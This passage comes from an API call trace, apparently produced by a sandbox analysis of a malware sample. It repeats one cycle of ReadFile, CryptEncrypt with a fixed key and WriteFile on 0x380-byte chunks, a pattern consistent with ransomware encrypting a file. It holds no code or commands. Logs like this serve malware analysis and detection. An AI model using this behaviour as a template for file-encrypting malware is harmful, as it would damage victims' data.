lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.334] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.334] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.334] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.336] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.336] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.336] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.336] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.336] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.336] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.337] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.337] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.337] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.337] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.337] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.337] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.337] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.338] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.338] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.338] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.338] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.338] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.338] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.338] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.339] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.339] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.339] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.339] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.339] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.339] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.340] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.340] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, 